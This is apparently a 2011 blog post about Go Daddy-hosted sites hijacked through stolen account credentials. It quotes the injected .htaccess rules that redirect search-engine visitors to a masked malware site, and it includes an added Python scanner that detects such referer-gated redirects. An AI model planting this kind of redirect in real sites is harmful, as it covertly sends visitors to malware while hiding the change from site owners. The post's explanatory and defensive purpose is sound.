Web sites hosted by Go Daddy hacked and rerouted to malware sites

Sep 18 2011 / By

If you have a Go Daddy account, I suggest you change your passwords immediately!  Go Daddy has admitted that at least 445 hosted web sites have had code inserted that hijacks the site by redirecting it to other sites that have malware installed.

Yes, that comes to just 0.0089% of all their hosted sites (around 5 million) so you would think this would not reach the news.  But it did make the news.

Go Daddy claims that the perpetrator(s) obtained usernames and passwords of Go Daddy clients, logged into the web sites and posted some code to redirect the sites to a really bad site.  Here is the code posted in one of the files for the web site:

    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*aswk.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
    RewriteRule . http://sok*********.com/in.php?g-916 [R,L]

(I changed the URL of the malware site.)
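For site owners checking their own files, here is a scanner for the referer-gated redirect shown above, added as an example (it is not code from the original post or from Go Daddy). It flags any RewriteRule that redirects to an outside host when it is guarded by Referer conditions; the function name, the `own_hosts` parameter and the sample domains are assumptions.

```python
import re

# RewriteCond on the Referer header; also tolerates the HTTP_REFERRER misspelling.
COND_RE = re.compile(r'^\s*RewriteCond\s+%\{HTTP_REFER+ER\}\s+(\S+)', re.I)
# RewriteRule whose substitution is an absolute http(s) URL, with optional [flags].
RULE_RE = re.compile(
    r'^\s*RewriteRule\s+\S+\s+(https?://([^/\s:]+)\S*)(?:\s+\[([^\]]*)\])?', re.I)
ANY_RULE_RE = re.compile(r'^\s*RewriteRule\b', re.I)

def find_referer_redirects(htaccess_text, own_hosts=()):
    """List RewriteRules that redirect to a host outside own_hosts and are
    guarded by at least one Referer condition."""
    own = {h.lower() for h in own_hosts}
    findings, pending = [], []
    for lineno, line in enumerate(htaccess_text.splitlines(), 1):
        cond = COND_RE.match(line)
        if cond:
            pending.append(cond.group(1))
            continue
        if not ANY_RULE_RE.match(line):
            continue
        rule = RULE_RE.match(line)
        if rule and pending:
            target, host, flags = rule.group(1), rule.group(2).lower(), rule.group(3) or ''
            names = {f.strip().upper().split('=')[0] for f in flags.split(',')}
            if host not in own and names & {'R', 'REDIRECT'}:
                findings.append({'line': lineno, 'target': target,
                                 'referer_patterns': pending})
        pending = []  # conditions only apply to the rule that follows them
    return findings

# Constructed sample: one ordinary canonical-host redirect and one referer-gated
# redirect to an outside host (placeholder domains, not taken from the incident).
SAMPLE = r"""RewriteEngine On
RewriteCond %{HTTP_HOST} ^example\.org$ [NC]
RewriteRule ^(.*)$ http://www.example.org/$1 [R=301,L]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC]
RewriteRule .* http://redirect-target.example/in.php [R,L]
"""

if __name__ == '__main__':
    for finding in find_referer_redirects(SAMPLE, own_hosts=['www.example.org']):
        print(finding)
```

Because the redirect only fires for visitors arriving from a search engine, an owner who types the address directly sees a normal site, so reading the file catches what browsing it does not.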

Go Daddy’s Chief Information Security Officer Todd Redfoot said “We are still investigating the issue, but so far our security team is confirming this was not an infrastructure breakdown and should not impact additional customers.  We quickly removed the malicious code and went to work to assist each of our customers to address the issue.”

A key phrase in Todd’s statement is “should not impact additional customers.”  I could be wrong, but this statement says to me that they are not confident that they found all the infected sites and more Go Daddy customers could be infected.

Todd also said “The accounts were accessed by using the account holder’s username and password.”  That tells all of us that whoever breached these accounts also has the credit card/bank information of all financial institutions attached to each customer account.

Where did they get the username/password combinations?  Was it a phishing email, a keystroke logger or a hack on Go Daddy’s customer database?  Go Daddy admits they have no idea how the account information was obtained.

Another question I would have to ask is whether the hacker(s) modified the web sites of all the accounts they had access to.  It is highly possible they gathered usernames and passwords of a lot more accounts and did not access them yet.  They could have also logged in, retrieved the financial information and left without anyone noticing.

I think it is time to change my Go Daddy password and cancel all the credit cards I have used to pay a Go Daddy bill.  I suggest you also take precautionary measures.

I wonder if Danica changed her password yet.
